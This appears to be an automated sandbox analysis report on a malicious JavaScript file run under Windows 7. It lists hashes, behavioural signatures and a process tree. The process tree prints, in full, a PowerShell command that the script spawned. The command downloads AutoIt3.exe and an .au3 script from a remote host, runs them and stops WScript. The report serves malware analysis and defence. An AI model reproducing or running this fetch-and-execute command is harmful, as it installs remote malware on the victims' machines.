Analysis
-
max time kernel
122s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
09-11-2023 03:01
Static task
static1
Behavioral task
behavioral1
Sample
6df349abef5559549975a85a1d4821e453d988fed82c65c26962c7675e678202.js
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
6df349abef5559549975a85a1d4821e453d988fed82c65c26962c7675e678202.js
Resource
win10v2004-20231020-en
General
-
Target
6df349abef5559549975a85a1d4821e453d988fed82c65c26962c7675e678202.js
-
Size
251KB
-
MD5
eeca398b61cdbb117cc991c5a1ad01cd
-
SHA1
ea910382bcb251f4888eb756045c9a28eec66563
-
SHA256
6df349abef5559549975a85a1d4821e453d988fed82c65c26962c7675e678202
-
SHA512
98bde2b2962c766096512c5b49c5c6f7d96044d351b500a7e4e0bc261cb9f91f2c8c88737d82c312deb47929f29dfb090213addcc93920210b417933c662d9b4
-
SSDEEP
6144:he7hgXeerjqlI2Iro+5e7hgXeerjqlI2Iro+8:hIhgSlI23GIhgSlI23V
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2132 powershell.exe 2132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2132 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2176 wrote to memory of 2132 2176 wscript.exe 28 PID 2176 wrote to memory of 2132 2176 wscript.exe 28 PID 2176 wrote to memory of 2132 2176 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\6df349abef5559549975a85a1d4821e453d988fed82c65c26962c7675e678202.js1⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351/msihujidbbn' -OutFile 'hujidbbn.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'hujidbbn.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-